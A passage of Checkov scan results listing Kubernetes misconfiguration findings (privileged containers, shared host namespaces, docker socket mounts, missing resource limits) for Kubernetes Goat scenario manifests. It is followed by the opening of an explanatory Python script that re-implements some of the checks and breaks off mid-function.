8 | CKV_K8S_20 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Containers should not run with allowPrivilegeEscalation
9 | CKV_K8S_13 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Memory limits should be set
10 | CKV_K8S_10 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | CPU requests should be set
11 | CKV_K8S_22 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Use read-only filesystem for containers where possible
12 | CKV_K8S_9 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Readiness Probe Should be Configured
13 | CKV_K8S_28 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Minimize the admission of containers with the NET_RAW capability
14 | CKV_K8S_30 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Apply security context to your pods and containers
15 | CKV_K8S_14 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Image Tag should be fixed - not latest or blank
16 | CKV_K8S_43 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | Image should use digest
17 | CKV_K8S_11 | /scenarios/cache-store/deployment.yaml | Deployment.cache-store-deployment.secure-middleware (container 0) | CPU limits should be set
18 | CKV_K8S_31 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default
19 | CKV_K8S_40 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Containers should run as a high UID to avoid host conflict
20 | CKV_K8S_29 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Apply security context to your pods and containers
21 | CKV_K8S_38 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Ensure that Service Account Tokens are only mounted where necessary
22 | CKV_K8S_21 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | The default namespace should not be used
23 | CKV_K8S_23 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default | Minimize the admission of root containers
24 | CKV_K8S_21 | /scenarios/build-code/deployment.yaml | Service.build-code-service.default | The default namespace should not be used
25 | CKV_K8S_37 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned
26 | CKV_K8S_8 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Liveness Probe Should be Configured
27 | CKV_K8S_12 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Memory requests should be set
28 | CKV_K8S_20 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation
29 | CKV_K8S_10 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | CPU requests should be set
30 | CKV_K8S_22 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Use read-only filesystem for containers where possible
31 | CKV_K8S_9 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Readiness Probe Should be Configured
32 | CKV_K8S_28 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability
33 | CKV_K8S_30 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Apply security context to your pods and containers
34 | CKV_K8S_14 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Image Tag should be fixed - not latest or blank
35 | CKV_K8S_43 | /scenarios/build-code/deployment.yaml | Deployment.build-code-deployment.default (container 0) | Image should use digest
36 | CKV_K8S_31 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Ensure that the seccomp profile is set to docker/default or runtime/default
37 | CKV_K8S_27 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Do not expose the docker daemon socket to containers
38 | CKV_K8S_40 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should run as a high UID to avoid host conflict
39 | CKV_K8S_19 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should not share the host network namespace
40 | CKV_K8S_17 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should not share the host process ID namespace
41 | CKV_K8S_18 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Containers should not share the host IPC namespace
42 | CKV_K8S_38 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Ensure that Service Account Tokens are only mounted where necessary
43 | CKV_K8S_21 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | The default namespace should not be used
44 | CKV_K8S_23 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default | Minimize the admission of root containers
45 | CKV_K8S_37 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Minimize the admission of containers with capabilities assigned
46 | CKV_K8S_8 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Liveness Probe Should be Configured
47 | CKV_K8S_20 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Containers should not run with allowPrivilegeEscalation
48 | CKV_K8S_16 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Container should not be privileged
49 | CKV_K8S_22 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Use read-only filesystem for containers where possible
50 | CKV_K8S_9 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Readiness Probe Should be Configured
51 | CKV_K8S_28 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Minimize the admission of containers with the NET_RAW capability
52 | CKV_K8S_25 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Minimize the admission of containers with added capability
53 | CKV_K8S_14 | /scenarios/docker-bench-security/deployment.yaml | DaemonSet.docker-bench-security.default (container 0) | Image Tag should be fixed - not latest or blank
54CKV_K8S_43/scenarios/docker-bench-security/deployment.yamlDaemonSet.docker-bench-security.default (container 0)Image should use digest
55CKV_K8S_31/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
56CKV_K8S_40/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultContainers should run as a high UID to avoid host conflict
57CKV_K8S_29/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultApply security context to your pods and containers
58CKV_K8S_38/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
59CKV_K8S_21/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultThe default namespace should not be used
60CKV_K8S_23/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.defaultMinimize the admission of root containers
61CKV_K8S_21/scenarios/kubernetes-goat-home/deployment.yamlService.kubernetes-goat-home-service.defaultThe default namespace should not be used
62CKV_K8S_37/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
63CKV_K8S_8/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Liveness Probe Should be Configured
64CKV_K8S_12/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Memory requests should be set
65CKV_K8S_20/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
66CKV_K8S_10/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)CPU requests should be set
67CKV_K8S_22/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Use read-only filesystem for containers where possible
68CKV_K8S_9/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Readiness Probe Should be Configured
69CKV_K8S_28/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
70CKV_K8S_30/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Apply security context to your pods and containers
71CKV_K8S_14/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Image Tag should be fixed - not latest or blank
72CKV_K8S_43/scenarios/kubernetes-goat-home/deployment.yamlDeployment.kubernetes-goat-home-deployment.default (container 0)Image should use digest
73CKV_K8S_31/scenarios/batch-check/job.yamlJob.batch-check-job.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
74CKV_K8S_40/scenarios/batch-check/job.yamlJob.batch-check-job.defaultContainers should run as a high UID to avoid host conflict
75CKV_K8S_29/scenarios/batch-check/job.yamlJob.batch-check-job.defaultApply security context to your pods and containers
76CKV_K8S_38/scenarios/batch-check/job.yamlJob.batch-check-job.defaultEnsure that Service Account Tokens are only mounted where necessary
77CKV_K8S_21/scenarios/batch-check/job.yamlJob.batch-check-job.defaultThe default namespace should not be used
78CKV_K8S_23/scenarios/batch-check/job.yamlJob.batch-check-job.defaultMinimize the admission of root containers
79CKV_K8S_37/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Minimize the admission of containers with capabilities assigned
80CKV_K8S_12/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Memory requests should be set
81CKV_K8S_20/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Containers should not run with allowPrivilegeEscalation
82CKV_K8S_13/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Memory limits should be set
83CKV_K8S_10/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)CPU requests should be set
84CKV_K8S_22/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Use read-only filesystem for containers where possible
85CKV_K8S_28/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Minimize the admission of containers with the NET_RAW capability
86CKV_K8S_30/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Apply security context to your pods and containers
87CKV_K8S_14/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Image Tag should be fixed - not latest or blank
88CKV_K8S_43/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Image should use digest
89CKV_K8S_11/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)CPU limits should be set
90CKV_K8S_31/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
91CKV_K8S_40/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultContainers should run as a high UID to avoid host conflict
92CKV_K8S_29/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultApply security context to your pods and containers
93CKV_K8S_38/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
94CKV_K8S_21/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultThe default namespace should not be used
95CKV_K8S_23/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultMinimize the admission of root containers
96CKV_K8S_21/scenarios/hunger-check/deployment.yamlService.hunger-check-service.defaultThe default namespace should not be used
97CKV_K8S_37/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
98CKV_K8S_8/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Liveness Probe Should be Configured
99CKV_K8S_12/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Memory requests should be set
100CKV_K8S_20/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
101CKV_K8S_13/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Memory limits should be set
102CKV_K8S_10/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)CPU requests should be set
103CKV_K8S_22/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Use read-only filesystem for containers where possible
104CKV_K8S_9/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Readiness Probe Should be Configured
105CKV_K8S_28/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
106CKV_K8S_30/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Apply security context to your pods and containers
107CKV_K8S_14/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Image Tag should be fixed - not latest or blank
108CKV_K8S_43/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Image should use digest
109CKV_K8S_11/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)CPU limits should be set
110CKV_K8S_31/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
111CKV_K8S_40/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultContainers should run as a high UID to avoid host conflict
112CKV_K8S_29/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultApply security context to your pods and containers
113CKV_K8S_38/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
114CKV_K8S_21/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultThe default namespace should not be used
115CKV_K8S_23/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultMinimize the admission of root containers
116CKV_K8S_21/scenarios/poor-registry/deployment.yamlService.poor-registry-service.defaultThe default namespace should not be used
117CKV_K8S_37/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
118CKV_K8S_8/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Liveness Probe Should be Configured
119CKV_K8S_12/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Memory requests should be set
120CKV_K8S_20/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
121CKV_K8S_10/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)CPU requests should be set
122CKV_K8S_22/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Use read-only filesystem for containers where possible
123CKV_K8S_9/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Readiness Probe Should be Configured
124CKV_K8S_28/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
125CKV_K8S_30/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Apply security context to your pods and containers
126CKV_K8S_14/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Image Tag should be fixed - not latest or blank
127CKV_K8S_43/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Image should use digest
128CKV_K8S_31/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
129CKV_K8S_40/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultContainers should run as a high UID to avoid host conflict
130CKV_K8S_17/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultContainers should not share the host process ID namespace
131CKV_K8S_29/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultApply security context to your pods and containers
132CKV_K8S_38/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultEnsure that Service Account Tokens are only mounted where necessary
133CKV_K8S_21/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultThe default namespace should not be used
134CKV_K8S_23/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultMinimize the admission of root containers
135CKV_K8S_37/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Minimize the admission of containers with capabilities assigned
136CKV_K8S_12/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Memory requests should be set
137CKV_K8S_20/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Containers should not run with allowPrivilegeEscalation
138CKV_K8S_13/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Memory limits should be set
139CKV_K8S_10/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)CPU requests should be set
140CKV_K8S_22/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Use read-only filesystem for containers where possible
141CKV_K8S_28/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Minimize the admission of containers with the NET_RAW capability
142CKV_K8S_30/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Apply security context to your pods and containers
143CKV_K8S_14/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Image Tag should be fixed - not latest or blank
144CKV_K8S_43/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Image should use digest
145CKV_K8S_11/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)CPU limits should be set
146CKV_K8S_31/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
147CKV_K8S_40/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultContainers should run as a high UID to avoid host conflict
148CKV_K8S_17/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultContainers should not share the host process ID namespace
149CKV_K8S_29/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultApply security context to your pods and containers
150CKV_K8S_38/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultEnsure that Service Account Tokens are only mounted where necessary
151CKV_K8S_21/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultThe default namespace should not be used
152CKV_K8S_23/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultMinimize the admission of root containers
153CKV_K8S_37/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Minimize the admission of containers with capabilities assigned
154CKV_K8S_12/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Memory requests should be set
155CKV_K8S_20/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Containers should not run with allowPrivilegeEscalation
156CKV_K8S_13/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Memory limits should be set
157CKV_K8S_10/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)CPU requests should be set
158CKV_K8S_22/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Use read-only filesystem for containers where possible
159CKV_K8S_28/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Minimize the admission of containers with the NET_RAW capability
160CKV_K8S_30/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Apply security context to your pods and containers
161CKV_K8S_14/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Image Tag should be fixed - not latest or blank
162CKV_K8S_43/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Image should use digest
163CKV_K8S_11/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)CPU limits should be set
164CKV_K8S_31/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
165CKV_K8S_27/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultDo not expose the docker daemon socket to containers
166CKV_K8S_40/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultContainers should run as a high UID to avoid host conflict
167CKV_K8S_29/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultApply security context to your pods and containers
168CKV_K8S_38/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
169CKV_K8S_21/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultThe default namespace should not be used
170CKV_K8S_23/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultMinimize the admission of root containers
171CKV_K8S_21/scenarios/health-check/deployment.yamlService.health-check-service.defaultThe default namespace should not be used
172CKV_K8S_37/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
173CKV_K8S_8/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Liveness Probe Should be Configured
174CKV_K8S_12/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Memory requests should be set
175CKV_K8S_20/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
176CKV_K8S_10/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)CPU requests should be set
177CKV_K8S_16/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Container should not be privileged
178CKV_K8S_22/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Use read-only filesystem for containers where possible
179CKV_K8S_9/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Readiness Probe Should be Configured
180CKV_K8S_28/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
181CKV_K8S_14/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Image Tag should be fixed - not latest or blank
182CKV_K8S_43/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Image should use digest
183CKV_K8S_31/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
184CKV_K8S_40/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultContainers should run as a high UID to avoid host conflict
185CKV_K8S_29/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultApply security context to your pods and containers
186CKV_K8S_38/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
187CKV_K8S_21/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultThe default namespace should not be used
188CKV_K8S_23/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultMinimize the admission of root containers
189CKV_K8S_21/scenarios/internal-proxy/deployment.yamlService.internal-proxy-api-service.defaultThe default namespace should not be used
190CKV_K8S_21/scenarios/internal-proxy/deployment.yamlService.internal-proxy-info-app-service.defaultThe default namespace should not be used
191CKV_K8S_37/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
192CKV_K8S_8/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Liveness Probe Should be Configured
193CKV_K8S_20/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
194CKV_K8S_22/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Use read-only filesystem for containers where possible
195CKV_K8S_9/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Readiness Probe Should be Configured
196CKV_K8S_28/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
197CKV_K8S_30/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Apply security context to your pods and containers
198CKV_K8S_14/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Image Tag should be fixed - not latest or blank
199CKV_K8S_43/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Image should use digest
200CKV_K8S_37/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Minimize the admission of containers with capabilities assigned
201CKV_K8S_8/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Liveness Probe Should be Configured
202CKV_K8S_20/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Containers should not run with allowPrivilegeEscalation
203CKV_K8S_22/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Use read-only filesystem for containers where possible
204CKV_K8S_9/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Readiness Probe Should be Configured
205CKV_K8S_28/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Minimize the admission of containers with the NET_RAW capability
206CKV_K8S_30/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Apply security context to your pods and containers
207CKV_K8S_14/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Image Tag should be fixed - not latest or blank
208CKV_K8S_43/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Image should use digest
209CKV_K8S_21/scenarios/system-monitor/deployment.yamlSecret.goatvault.defaultThe default namespace should not be used
210CKV_K8S_31/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
211CKV_K8S_40/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultContainers should run as a high UID to avoid host conflict
212CKV_K8S_19/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultContainers should not share the host network namespace
213CKV_K8S_17/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultContainers should not share the host process ID namespace
214CKV_K8S_18/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultContainers should not share the host IPC namespace
215CKV_K8S_29/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultApply security context to your pods and containers
216CKV_K8S_38/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
217CKV_K8S_21/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultThe default namespace should not be used
218CKV_K8S_23/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultMinimize the admission of root containers
219CKV_K8S_21/scenarios/system-monitor/deployment.yamlService.system-monitor-service.defaultThe default namespace should not be used
220CKV_K8S_37/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
221CKV_K8S_8/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Liveness Probe Should be Configured
222CKV_K8S_12/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Memory requests should be set
223CKV_K8S_20/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
224CKV_K8S_10/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)CPU requests should be set
225CKV_K8S_16/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Container should not be privileged
226CKV_K8S_22/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Use read-only filesystem for containers where possible
227CKV_K8S_9/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Readiness Probe Should be Configured
228CKV_K8S_35/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Prefer using secrets as files over secrets as environment variables
229CKV_K8S_28/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
230CKV_K8S_14/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Image Tag should be fixed - not latest or blank
231CKV_K8S_43/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Image should use digest
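The findings above are the pod-spec settings that turn a Kubernetes Goat scenario into an attack path (shared host namespaces, privileged containers, the docker socket mounted from the host, secrets in environment variables, unpinned images). The following is an added example, not Kubernetes Goat code and not Checkov's own implementation: it re-implements the intent of the most security-relevant CKV_K8S_* checks in the table over an already-parsed manifest, and runs it against a constructed weak Deployment (modelled on the patterns reported above) and its hardened counterpart. The manifests, image names and secret names are assumptions made up for the example; check IDs and descriptions follow the table.

```python
"""Re-implementation of the intent of several CKV_K8S_* checks from the table above.
Added example: not Kubernetes Goat code and not Checkov's own logic. The two
manifests below are constructed dicts (YAML already parsed), not project files."""

DOCKER_SOCKET = "/var/run/docker.sock"
WORKLOADS = {"Pod", "Deployment", "DaemonSet", "StatefulSet", "Job", "CronJob"}


def pod_spec(manifest: dict) -> dict:
    """Locate the PodSpec inside any of the common workload kinds."""
    kind, spec = manifest["kind"], manifest.get("spec", {})
    if kind == "Pod":
        return spec
    if kind == "CronJob":
        return spec["jobTemplate"]["spec"]["template"]["spec"]
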